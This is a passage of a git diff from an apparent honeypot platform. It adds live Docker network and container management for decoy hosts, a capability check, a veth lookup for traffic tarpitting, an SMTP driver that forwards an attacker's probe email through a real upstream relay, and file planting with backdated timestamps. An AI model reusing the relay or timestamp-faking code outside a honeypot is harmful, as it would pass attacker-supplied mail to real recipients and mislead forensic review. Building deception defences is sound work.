the topology is not active/degraded (a pending topology gets its + networks created at deploy time), + * the topology is pinned to a swarm agent (cross-host materialisation + isn't implemented; the agent's apply_topology RPC re-renders the + whole compose at next push), + * the docker SDK / networking primitive raises (logged, not + re-raised — the DB row is the source of truth). + """ + topology = await repo.get_topology(topology_id) + if topology is None: + return + status = topology.status + if status not in ("active", "degraded"): + return + if topology.target_host_uuid: + _log.info( + "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile", + topology_id, + ) + return + + # Lazy imports — these pull in docker.py / network.py which both + # require the docker SDK; keeping them out of module-import keeps + # the mutator usable in test environments that stub docker. + import docker + from decnet.engine.deployer import _topology_compose_path + from decnet.network import create_bridge_network, remove_bridge_network + from decnet.topology.compose import _network_name, write_topology_compose + + client = docker.from_env() + try: + if created is not None: + name, subnet, is_dmz = created + net_name = _network_name(topology_id, name) + try: + create_bridge_network( + client, net_name, subnet, internal=not is_dmz, + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s", + topology_id, name, subnet, exc, + ) + # Don't re-raise — the DB row is the source of truth. + # Operator can retry by removing + re-adding the LAN. + if removed is not None: + net_name = _network_name(topology_id, removed) + try: + remove_bridge_network(client, net_name) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live remove_lan: bridge remove failed topology=%s lan=%s: %s", + topology_id, removed, exc, + ) + + # Re-render compose so the file on disk matches the DB. Even + # when the bridge create above failed, a future redeploy will + # try to bring the network back from the compose definition. + hydrated = await hydrate(repo, topology_id) + if hydrated is not None: + try: + write_topology_compose( + hydrated, _topology_compose_path(topology_id), + ) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live LAN op: compose re-render failed topology=%s: %s", + topology_id, exc, + ) + except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure + _log.error( + "live LAN materialisation crashed topology=%s: %s", + topology_id, exc, + ) + + +def _is_buildx_wedge(exc: BaseException) -> bool: + """True when *exc* looks like the buildx EROFS wedge. + + We consult both the structured CalledProcessError.stderr and the + str(exc) form because ``_compose_with_retry`` raises a synthetic + CalledProcessError whose ``stderr`` contains the recovery hint + (which preserves the wedge signatures verbatim). + """ + from decnet.engine.deployer import ( + _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE, + ) + stderr = "" + if hasattr(exc, "stderr") and exc.stderr: + stderr = str(exc.stderr) + haystack = (stderr + " " + str(exc)).lower() + return ( + _BUILDX_WEDGE_SIGNATURE in haystack + and _BUILDX_EROFS_SIGNATURE in haystack + ) + + +async def _compose_up_with_buildkit_fallback( + *args: str, compose_file, label: str, +) -> None: + """Run ``compose up`` and auto-fall-back to the legacy builder on wedge. + + The buildx activity dir occasionally lands on a read-only mount — + happens enough on operator dev boxes that we don't want a single + wedge to abort a live decky-add. When _compose_with_retry raises + with the EROFS-wedge signatures, we retry once with + ``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't + use the activity dir and isn't affected. + + *label* is a human-readable identifier used only in log lines so an + operator can grep the fall-back back to the originating op. + """ + import anyio + from decnet.engine.deployer import _compose_with_retry + try: + await anyio.to_thread.run_sync( + lambda: _compose_with_retry(*args, compose_file=compose_file), + ) + return + except Exception as exc: # noqa: BLE001 + if not _is_buildx_wedge(exc): + raise + _log.warning( + "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 " + "(legacy builder). Recover the buildx state at your leisure: " + "rm -rf ~/.docker/buildx/activity && " + "docker buildx create --name decnet-builder --use --bootstrap", + label, + ) + # Outside the except so the second attempt's traceback isn't + # nested under the first failure if it also blows up. + await anyio.to_thread.run_sync( + lambda: _compose_with_retry( + *args, compose_file=compose_file, + env={"DOCKER_BUILDKIT": "0"}, + ), + ) + + +def _decky_targets(decky_name: str, services: list[str]) -> list[str]: + """Compose service names for one decky: base + each per-decky service. + + Skips ``fleet_singleton`` services — those run once fleet-wide and + don't have a per-decky compose entry. Mirrors the same filter + applied at compose-render time + (:mod:`decnet.topology.compose.generate_topology_compose`). + """ + from decnet.services.registry import get_service + targets = [decky_name] + for svc_name in services: + try: + svc = get_service(svc_name) + except KeyError: + # Unknown service — leave it; the compose render won't emit + # a fragment for it, so compose up will simply ignore the + # name with a clear "no such service" error. Surface that + # rather than silently dropping it. + targets.append(f"{decky_name}-{svc_name}") + continue + if svc.fleet_singleton: + continue + targets.append(f"{decky_name}-{svc_name}") + return targets + + +async def _live_topology_or_none( + repo: Any, topology_id: str, +) -> Optional[dict[str, Any]]: + """Return the topology row only when it's eligible for live materialisation. + + Returns None (so callers can skip with a single ``if`` check) when: + + * the topology doesn't exist; + * status is not ``active`` or ``degraded`` (pending topologies get + everything materialised at deploy time); + * the topology is pinned to a swarm agent (cross-host live editing + is its own routing workstream). + """ + topology = await repo.get_topology(topology_id) + if topology is None: + return None + if topology.status not in ("active", "degraded"): + return None + if topology.target_host_uuid: + _log.info( + "live decky op skipped (agent-pinned topology=%s); " + "next agent push will reconcile", + topology_id, + ) + return None + return topology + + +async def _rerender_compose(repo: Any, topology_id: str) -> None: + """Re-render the per-topology compose file from the current DB. + + Called after each materialisation step so the file on disk matches + the topology rows. Soft-fails: a render error is logged but + doesn't poison the DB-side mutation. + """ + from decnet.engine.deployer import _topology_compose_path + from decnet.topology.compose import write_topology_compose + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + return + try: + write_topology_compose(hydrated, _topology_compose_path(topology_id)) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live op: compose re-render failed topology=%s: %s", + topology_id, exc, + ) + + +async def _materialise_decky_spawn( + repo: Any, topology_id: str, decky_name: str, services: list[str], +) -> bool: + """compose up -d --no-deps --build for one decky (base + services). + + Re-renders compose first so the file lists the new decky. Returns + True when compose-up reported success, False otherwise (or when + the topology isn't eligible for live materialisation — pending + topologies skip and return False so the caller doesn't flip the + state to ``running`` based on a no-op). Best-effort: docker + failure is logged, not re-raised — DB row is the source of truth. + """ + if await _live_topology_or_none(repo, topology_id) is None: + return False + from decnet.engine.deployer import _topology_compose_path + await _rerender_compose(repo, topology_id) + targets = _decky_targets(decky_name, services) + compose_path = _topology_compose_path(topology_id) + try: + await _compose_up_with_buildkit_fallback( + "up", "-d", "--no-deps", "--build", *targets, + compose_file=compose_path, + label=f"live add_decky topology={topology_id} decky={decky_name}", + ) + return True + except Exception as exc: # noqa: BLE001 + _log.error( + "live add_decky: compose up failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + return False + + +async def _materialise_decky_remove( + repo: Any, topology_id: str, decky_name: str, services: list[str], +) -> None: + """compose stop + rm -f for one decky's containers, then re-render.""" + if await _live_topology_or_none(repo, topology_id) is None: + return + import anyio + from decnet.engine.deployer import _compose, _topology_compose_path + + targets = _decky_targets(decky_name, services) + compose_path = _topology_compose_path(topology_id) + # Stop + rm BEFORE re-rendering compose; the re-rendered file no + # longer mentions the decky, so a stop run AFTER rendering would + # find no service to act on. + try: + await anyio.to_thread.run_sync( + lambda: _compose("stop", *targets, compose_file=compose_path), + ) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live remove_decky: compose stop failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + try: + await anyio.to_thread.run_sync( + lambda: _compose("rm", "-f", *targets, compose_file=compose_path), + ) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live remove_decky: compose rm failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + await _rerender_compose(repo, topology_id) + + +async def _materialise_decky_connect( + repo: Any, topology_id: str, + decky_name: str, lan_name: str, ipv4_address: str, +) -> None: + """SDK ``network.connect`` to multi-home a running base container. + + Service containers share the base's netns via ``network_mode: + service:`` (see :mod:`decnet.topology.compose`), so attaching + the base alone gives every service container the new interface for + free — we don't need to iterate. + """ + if await _live_topology_or_none(repo, topology_id) is None: + return + import docker + from decnet.topology.compose import _container_name, _network_name + + net_name = _network_name(topology_id, lan_name) + container_name = _container_name(topology_id, decky_name) + try: + client = docker.from_env() + net = client.networks.get(net_name) + container = client.containers.get(container_name) + net.connect(container, ipv4_address=ipv4_address) + except docker.errors.APIError as exc: + # Idempotency — already on the network is fine. + msg = str(exc).lower() + if "already" in msg or "endpoint" in msg and "exists" in msg: + _log.info( + "live attach_decky: %s already on network %s — skipping", + container_name, net_name, + ) + else: + _log.error( + "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s", + topology_id, decky_name, lan_name, exc, + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s", + topology_id, decky_name, lan_name, exc, + ) + await _rerender_compose(repo, topology_id) + + +async def _materialise_decky_disconnect( + repo: Any, topology_id: str, decky_name: str, lan_name: str, +) -> None: + """SDK ``network.disconnect`` to drop a multi-home edge.""" + if await _live_topology_or_none(repo, topology_id) is None: + return + import docker + from decnet.topology.compose import _container_name, _network_name + + net_name = _network_name(topology_id, lan_name) + container_name = _container_name(topology_id, decky_name) + try: + client = docker.from_env() + net = client.networks.get(net_name) + container = client.containers.get(container_name) + net.disconnect(container) + except docker.errors.APIError as exc: + msg = str(exc).lower() + if "not connected" in msg or "no such" in msg: + _log.info( + "live detach_decky: %s already off network %s — skipping", + container_name, net_name, + ) + else: + _log.error( + "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s", + topology_id, decky_name, lan_name, exc, + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s", + topology_id, decky_name, lan_name, exc, + ) + await _rerender_compose(repo, topology_id) + + +async def _materialise_decky_services_diff( + repo: Any, topology_id: str, + decky_name: str, + added: list[str], + removed: list[str], +) -> None: + """Add/remove per-service containers without touching siblings. + + Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but + without coupling the mutator to that module — service mutations + routed via the mutator queue publish ``mutation.applied`` while the + direct API publishes ``decky..service_added``; they share + machinery, not control flow. + """ + if not added and not removed: + return + if await _live_topology_or_none(repo, topology_id) is None: + return + import anyio + from decnet.engine.deployer import _compose, _topology_compose_path + + await _rerender_compose(repo, topology_id) + compose_path = _topology_compose_path(topology_id) + add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base + if add_targets: + try: + await _compose_up_with_buildkit_fallback( + "up", "-d", "--no-deps", "--build", *add_targets, + compose_file=compose_path, + label=f"live update_decky add topology={topology_id} decky={decky_name}", + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live update_decky add: compose up failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + rm_targets = _decky_targets(decky_name, list(removed))[1:] + for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))): + if not rm_targets: + break + try: + await anyio.to_thread.run_sync( + lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc] + ) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live update_decky %s failed topology=%s decky=%s: %s", + action_name, topology_id, decky_name, exc, + ) + + +async def _materialise_decky_recreate_base( + repo: Any, topology_id: str, decky_name: str, +) -> None: + """Force-recreate just the base container (used for forwards_l3 flips). + + DESTRUCTIVE: kills any in-container state on the base. Service + containers re-attach via ``network_mode: service:`` after the + base is rebuilt. Caller is responsible for gating this on an + explicit operator-supplied ``force=true`` flag. + """ + if await _live_topology_or_none(repo, topology_id) is None: + return + import anyio + from decnet.engine.deployer import ( + _compose_with_retry, _topology_compose_path, + ) + await _rerender_compose(repo, topology_id) + compose_path = _topology_compose_path(topology_id) + try: + await anyio.to_thread.run_sync( + lambda: _compose_with_retry( + "up", "-d", "--no-deps", "--force-recreate", decky_name, + compose_file=compose_path, + ), + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live update_decky recreate_base failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + + # ------------------------------------------------------------------- ops @@ -131,6 +588,16 @@ async def apply_add_lan( "y": payload.get("y"), } ) + + # Live materialisation: when the topology is active/degraded, create + # the docker bridge network now and re-render the per-topology + # compose file so subsequent ``apply_add_decky`` writes a coherent + # services map. Pending topologies skip this — the next deploy + # creates everything from scratch. Agent-pinned topologies also + # skip; live editing on agents is its own routing problem. + await _materialise_lan_change( + repo, topology_id, created=(name, subnet, is_dmz), + ) await _assert_valid_after(repo, topology_id) @@ -150,7 +617,17 @@ async def apply_remove_lan( f"LAN {lan['name']!r} is the home LAN of decky " f"{d['decky_config']['name']!r}; remove the decky first" ) - await repo.delete_lan(lan["id"]) + lan_name = lan["name"] + # enforce_pending=False: the mutator queue is the live-editing + # surface, gated on topology status by us before we got here. The + # repo's pending-only guard is for HTTP CRUD callers that mustn't + # bypass it. + await repo.delete_lan(lan["id"], enforce_pending=False) + + # Live materialisation symmetric to apply_add_lan: tear down the + # docker bridge and re-render compose so a future redeploy doesn't + # try to wire deckies into a network that no longer exists. + await _materialise_lan_change(repo, topology_id, removed=lan_name) await _assert_valid_after(repo, topology_id) @@ -204,11 +681,12 @@ async def apply_add_decky( if forwards_l3: decky_config["forwards_l3"] = True + services_list = list(payload.get("services", [])) decky_uuid = await repo.add_topology_decky( { "topology_id": topology_id, "name": name, - "services": list(payload.get("services", [])), + "services": services_list, "decky_config": decky_config, "x": payload.get("x"), "y": payload.get("y"), @@ -223,6 +701,25 @@ async def apply_add_decky( "forwards_l3": forwards_l3, } ) + # Live materialisation: spawn the new decky's containers without + # touching siblings. Skips on pending / agent-pinned topologies — + # see _live_topology_or_none. + spawned = await _materialise_decky_spawn( + repo, topology_id, name, services_list, + ) + # Flip the row's state to 'running' on success so the dashboard's + # ACTIVE DECKIES count reflects reality. Without this the row + # stays at the default 'pending' forever; the deployer's full + # post-deploy reconcile only runs on a fresh deploy_topology. + if spawned: + try: + await repo.update_topology_decky(decky_uuid, {"state": "running"}) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live add_decky: state flip to running failed " + "topology=%s decky=%s: %s", + topology_id, name, exc, + ) await _assert_valid_after(repo, topology_id) @@ -286,6 +783,16 @@ async def apply_attach_decky( "forwards_l3": forwards_l3, } ) + # Live materialisation: SDK network.connect on the base container. + # Service containers share the base's netns via network_mode: + # service:, so they inherit the new interface — only the base + # needs the connect. + await _materialise_decky_connect( + repo, topology_id, + decky_name=decky["decky_config"]["name"], + lan_name=lan["name"], + ipv4_address=ip, + ) await _assert_valid_after(repo, topology_id) @@ -329,7 +836,15 @@ async def apply_detach_decky( await repo.update_topology_decky( decky["uuid"], {"decky_config": new_cfg} ) - await repo.delete_topology_edge(edge["id"]) + await repo.delete_topology_edge(edge["id"], enforce_pending=False) + # Live materialisation: SDK network.disconnect on the base + # container. Service containers automatically lose visibility into + # the LAN because they share the base's netns. + await _materialise_decky_disconnect( + repo, topology_id, + decky_name=decky["decky_config"]["name"], + lan_name=lan["name"], + ) await _assert_valid_after(repo, topology_id) @@ -340,7 +855,15 @@ async def apply_remove_decky( decky = _decky_by_name(hydrated, payload["decky"]) if decky is None: raise MutationError(f"decky {payload['decky']!r} not found") - await repo.delete_topology_decky(decky["uuid"]) + decky_name = decky["decky_config"]["name"] + services_list = list(decky.get("services") or []) + await repo.delete_topology_decky(decky["uuid"], enforce_pending=False) + # Live materialisation: stop + rm -f the decky's containers. We + # capture decky_name + services BEFORE the delete so the helper + # has the targets even though the row is gone. + await _materialise_decky_remove( + repo, topology_id, decky_name, services_list, + ) await _assert_valid_after(repo, topology_id) @@ -354,31 +877,136 @@ async def apply_update_decky( ``patch`` — dict merged into existing ``decky_config``. ``services`` — replacement top-level services list. ``x``,``y`` — layout coords. + ``force`` — opt-in for destructive recreates (currently + required when ``forwards_l3`` flips on a + live topology — see below). + + Live materialisation strategy: + + * **services changed** → diff old vs new; ``compose up -d`` for + added, ``compose stop`` + ``rm -f`` for removed. Mirrors the + direct API path (services_live) without coupling. + * **forwards_l3 flipped** → port publishing changes, which docker + can only apply at container-create time. Requires recreating + the base — destructive (kills in-container state, drops active + sessions). Gated on ``payload['force'] is True``; otherwise we + raise ``MutationError`` so a half-thinking operator doesn't + stomp a live decky. + * **only coords (x/y)** → DB-only. No docker work. """ hydrated = await _hydrated(repo, topology_id) decky = _decky_by_name(hydrated, payload["decky"]) if decky is None: raise MutationError(f"decky {payload['decky']!r} not found") + + # Capture pre-state so we can compute the diff after the DB write. + old_services = list(decky.get("services") or []) + old_cfg = decky.get("decky_config") or {} + old_forwards_l3 = bool(old_cfg.get("forwards_l3", False)) + patch: dict[str, Any] = {} + new_decky_config = old_cfg if payload.get("patch"): - merged = dict(decky["decky_config"]) - merged.update(payload["patch"]) - patch["decky_config"] = merged + new_decky_config = {**old_cfg, **payload["patch"]} + patch["decky_config"] = new_decky_config + new_services = old_services if "services" in payload: - patch["services"] = list(payload["services"]) + new_services = list(payload["services"]) + patch["services"] = new_services for key in ("x", "y"): if key in payload: patch[key] = payload[key] if not patch: return + + new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False)) + forwards_l3_flipped = new_forwards_l3 != old_forwards_l3 + + # Promotion path: refuse to flip a non-DMZ decky to gateway. The + # 'gateway' semantic specifically means 'host-port publisher facing + # the DMZ' — running it on an internal LAN publishes ports the + # outside world can't reach and shadows the host's port space. + # Generic L3-bridge forwards_l3 (internal multi-homing) is set by + # the generator/attach paths, not by this op, so this check only + # fires when the operator explicitly toggles the flag. + if forwards_l3_flipped and new_forwards_l3: + # Re-derive the home LAN from the edges; same logic as + # check_gateway_homed_in_dmz. + decky_uuid = decky["uuid"] + home_lan_id: Optional[str] = None + for e in hydrated["edges"]: + if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False: + home_lan_id = e["lan_id"] + break + if home_lan_id is None: + for e in hydrated["edges"]: + if e["decky_uuid"] == decky_uuid: + home_lan_id = e["lan_id"] + break + home_lan = next( + (lan for lan in hydrated["lans"] if lan["id"] == home_lan_id), + None, + ) + if home_lan is None or not home_lan.get("is_dmz"): + home_name = home_lan["name"] if home_lan else "(unknown)" + raise MutationError( + f"cannot promote decky {decky['decky_config']['name']!r} " + f"to gateway: home LAN {home_name!r} is not a DMZ. " + "Move the decky to the DMZ first, or pick a different decky." + ) + + # Pre-check the destructive flip BEFORE any DB write, so a refused + # mutation leaves zero side-effects. + is_live = (await _live_topology_or_none(repo, topology_id)) is not None + if is_live and forwards_l3_flipped and not bool(payload.get("force")): + raise MutationError( + f"forwards_l3 flip on live decky " + f"{decky['decky_config']['name']!r} requires force=true; " + "this will recreate the base container and drop in-container state" + ) + await repo.update_topology_decky(decky["uuid"], patch) + + # Materialisation — only when the topology is actually live. + # _live_topology_or_none was already called above; calling the + # individual helpers re-checks (cheap) so they stay self-contained. + decky_name = decky["decky_config"]["name"] + added = sorted(set(new_services) - set(old_services)) + removed = sorted(set(old_services) - set(new_services)) + if added or removed: + await _materialise_decky_services_diff( + repo, topology_id, decky_name, added, removed, + ) + if forwards_l3_flipped: + # force was checked above; reaching here means the operator + # opted in. recreate_base re-renders compose first so the + # rebuilt base picks up the new `ports:` block. + await _materialise_decky_recreate_base( + repo, topology_id, decky_name, + ) + await _assert_valid_after(repo, topology_id) async def apply_update_lan( repo: Any, topology_id: str, payload: dict[str, Any] ) -> None: - """Update LAN fields — subnet, is_dmz, coords, rename.""" + """Update LAN fields — subnet, is_dmz, coords, rename. + + Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time. + Live deckies bind to the bridge with IPs allocated from the old + subnet (and ``is_dmz`` flips swap the bridge's ``internal=False`` + flag, which docker can't change on a network with active + containers). Reject those mutations on active/degraded topologies + rather than rewriting the DB into an incoherent state. + + Coord-only updates (``x``/``y``) are layout-only; let them through + unconditionally. Renames pass through too — the bridge's docker + name is keyed off ``_network_name(topology_id, lan_name)``, so a + rename would also need a rebuild — but rename isn't currently a + code path on active topologies; if the operator hits it we still + write the row and let the next deploy reconcile. + """ hydrated = await _hydrated(repo, topology_id) lan = _lan_by_name(hydrated, payload["name"]) if lan is None: @@ -389,6 +1017,17 @@ async def apply_update_lan( fields[key] = payload[key] if not fields: return + + topology = await repo.get_topology(topology_id) + is_live = bool(topology) and topology.status in ("active", "degraded") + if is_live: + hostile = {"subnet", "is_dmz"} & fields.keys() + if hostile: + raise MutationError( + f"cannot change {sorted(hostile)} on a deployed LAN; " + f"teardown + redeploy required" + ) + await repo.update_lan(lan["id"], fields) await _assert_valid_after(repo, topology_id) diff --git a/decnet/network.py b/decnet/network.py index c150071e..5eaa7474 100644 --- a/decnet/network.py +++ b/decnet/network.py @@ -303,11 +303,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None: # Host-side macvlan interface (hairpin fix) # --------------------------------------------------------------------------- -def _require_root() -> None: - if os.geteuid() != 0: - raise PermissionError( - "MACVLAN host-side interface setup requires root. Run with sudo." - ) +# Linux capability bit positions — see capabilities(7). +_CAP_NET_ADMIN = 12 + + +def _has_cap_net_admin() -> bool: + """True if the current process holds CAP_NET_ADMIN in its effective set. + + Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we + don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask; + bit 12 is CAP_NET_ADMIN. + """ + try: + with open("/proc/self/status", "r") as fh: + for line in fh: + if line.startswith("CapEff:"): + bits = int(line.split()[1], 16) + return bool(bits & (1 << _CAP_NET_ADMIN)) + except OSError: + pass + return False + + +def _require_net_admin() -> None: + """Reject early if the process can't run ``ip link add ... macvlan``. + + CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK + of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap) + but not necessary. Prefer the cap check so the systemd unit's + ``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the + whole API to run as root. + """ + if os.geteuid() == 0 or _has_cap_net_admin(): + return + raise PermissionError( + "MACVLAN host-side interface setup needs CAP_NET_ADMIN. " + "Either run as root or grant the cap (systemd: " + "AmbientCapabilities=CAP_NET_ADMIN)." + ) def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None: @@ -317,7 +350,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str host-helper first: the two drivers can share a parent NIC on paper but leaving the opposite helper in place is just cruft after a driver swap. """ - _require_root() + _require_net_admin() + + _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) @@ -332,7 +367,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str def teardown_host_macvlan(decky_ip_range: str) -> None: - _require_root() + _require_net_admin() _run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) @@ -344,7 +379,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str) host-helper first so a prior macvlan deploy doesn't leave its slave dangling on the parent NIC after the driver swap. """ - _require_root() + _require_net_admin() + + _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) @@ -358,7 +395,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str) def teardown_host_ipvlan(decky_ip_range: str) -> None: - _require_root() + _require_net_admin() _run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) @@ -378,3 +415,47 @@ def ips_to_range(ips: list[str]) -> str: strict=False, ) return str(network) + + +# --------------------------------------------------------------------------- +# Container veth resolution (for tc netem tarpit) +# --------------------------------------------------------------------------- + +def get_container_pid(container_name: str) -> int: + """Return the PID of a running container's init process.""" + client = docker.from_env() + try: + container = client.containers.get(container_name) + except docker.errors.NotFound: + raise LookupError(f"container {container_name!r} not found") + pid = container.attrs["State"]["Pid"] + if not pid: + raise LookupError(f"container {container_name!r} is not running (PID=0)") + return pid + + +def get_container_veth(container_name: str) -> str: + """Return the host veth interface name paired to container_name's eth0. + + Reads /sys/class/net/eth0/iflink from inside the container to get the + peer interface index, then matches it against ``ip link show`` on the host. + Requires no nsenter and no elevated privileges beyond what Docker exec grants. + """ + result = _run( + ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"], + check=False, + ) + if result.returncode != 0: + raise LookupError( + f"container {container_name!r} not reachable: {result.stderr.strip()}" + ) + peer_index = result.stdout.strip() + links = _run(["ip", "link", "show"]) + for line in links.stdout.splitlines(): + if line.startswith(f"{peer_index}:"): + # Format: "42: veth3a4b5c@if41: " + iface = line.split(":")[1].strip().split("@")[0] + return iface + raise LookupError( + f"no host veth found for container {container_name!r} (peer ifindex {peer_index})" + ) diff --git a/decnet/orchestrator/drivers/smtp_relay.py b/decnet/orchestrator/drivers/smtp_relay.py new file mode 100644 index 00000000..4c1be0df --- /dev/null +++ b/decnet/orchestrator/drivers/smtp_relay.py @@ -0,0 +1,80 @@ +"""SMTP probe-relay driver. + +Forwards the attacker's first probe email via the master's real internet +connection. The smtp_relay decky runs on MACVLAN and has no gateway access; +the master (where this worker runs) does. + +Called by the realism worker's smtp probe listener, not the main tick loop. +""" +from __future__ import annotations + +import email +import smtplib +from pathlib import Path +from typing import Any + +_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts" + + +def _ensure_from_header(body: bytes, mail_from: str) -> bytes: + """Return body with a From: header added if one is absent.""" + try: + msg = email.message_from_bytes(body) + except Exception: + return body + if msg["From"]: + return body + # Prepend the header before the existing content. + header_line = f"From: {mail_from}\r\n".encode() + return header_line + body + + +def forward_probe( + *, + svc_cfg: dict[str, Any], + stored_as: str, + decky_name: str, + mail_from: str, + rcpt_to: list[str], + artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT, +) -> tuple[bool, str]: + """Read the .eml from disk and forward it via the upstream relay. + + Returns (True, "") on success or (False, reason) on failure. + Always safe to call in a thread — uses only blocking I/O. + """ + upstream_host = (svc_cfg.get("upstream_host") or "").strip() + if not upstream_host: + return False, "upstream_host not configured" + + eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as + try: + body = eml_path.read_bytes() + except OSError as exc: + return False, f"cannot read eml: {exc}" + + if not rcpt_to: + return False, "no recipients" + + upstream_port = int(svc_cfg.get("upstream_port") or 25) + upstream_user = (svc_cfg.get("upstream_user") or "").strip() + upstream_pass = (svc_cfg.get("upstream_pass") or "").strip() + envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from + + # Ensure the message has a From: header so mail clients show the attacker's + # address rather than falling back to the envelope sender (upstream_sender). + # Minimal relay-test scripts often omit headers entirely. + body = _ensure_from_header(body, mail_from) + + try: + with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn: + conn.ehlo() + if conn.has_extn("STARTTLS"): + conn.starttls() + conn.ehlo() + if upstream_user and upstream_pass: + conn.login(upstream_user, upstream_pass) + conn.sendmail(envelope_from, rcpt_to, body) + return True, "" + except Exception as exc: + return False, str(exc)[:256] diff --git a/decnet/orchestrator/drivers/ssh.py b/decnet/orchestrator/drivers/ssh.py index 9718028e..15335a97 100644 --- a/decnet/orchestrator/drivers/ssh.py +++ b/decnet/orchestrator/drivers/ssh.py @@ -18,11 +18,8 @@ or IP can't escape into a shell. from __future__ import annotations import asyncio -import shlex from typing import Any - -import base64 -from datetime import datetime, timezone +from datetime import datetime from decnet.logging import get_logger from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult @@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver): ) -> ActivityResult: """Write *content* to *path* inside *decky_name*'s ssh container. - Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s - ARG_MAX-safe write — see commit c17b9e0). Sets file mode and, - when *mtime* is provided, ``touch -d`` to backdate the file so - it doesn't all stamp at wall-clock-now (the realism failure - this migration is fixing). + Delegates to :func:`decnet.decky_io.write_file_to_container`, + which carries the ARG_MAX-safe base64-via-stdin trick. Sets + file mode and, when *mtime* is provided, ``touch -d`` to + backdate the file (otherwise everything stamps at wall-clock-now + — the realism failure this path was originally fixing). """ + from decnet.decky_io import write_file_to_container + container = _container_for(decky_name) - b64 = base64.b64encode(content).decode("ascii") - # touch -d accepts ISO 8601; we always emit UTC so the - # container's local TZ doesn't drift the mtime. - if mtime is not None: - ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC") - touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}" - else: - touch_cmd = f"touch {shlex.quote(path)}" - sh_cmd = ( - f"mkdir -p {shlex.quote(_dirname(path))} && " - f"base64 -d > {shlex.quote(path)} && " - f"chmod {mode:o} {shlex.quote(path)} && " - f"{touch_cmd}" + success, error = await write_file_to_container( + container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT, ) - argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd] - rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii")) - success = rc == 0 payload: dict[str, Any] = { "dst_decky": decky_name, "path": path, "bytes": len(content), - "rc": rc, - "stderr": stderr.strip()[:256] if not success else None, + "rc": 0 if success else 1, + "stderr": error if not success else None, } return ActivityResult(success=success, payload=payload) @@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver): ) -def _dirname(path: str) -> str: - """Pure-string dirname. We can't trust ``os.path.dirname`` on the - host to share the destination container's separator semantics, but - deckies are POSIX so a plain ``rfind('/')`` suffices.""" - idx = path.rfind("/") - if idx <= 0: - return "/" - return path[:idx] diff --git a/decnet/orchestrator/emailgen/scheduler.py b/decnet/orchestrator/emailgen/scheduler.py index a1f80214..51d0f735 100644 --- a/decnet/orchestrator/emailgen/scheduler.py +++ b/decnet/orchestrator/emailgen/scheduler.py @@ -175,7 +175,7 @@ async def pick( ) return None - active = [p for p in personas if in_active_hours(p, 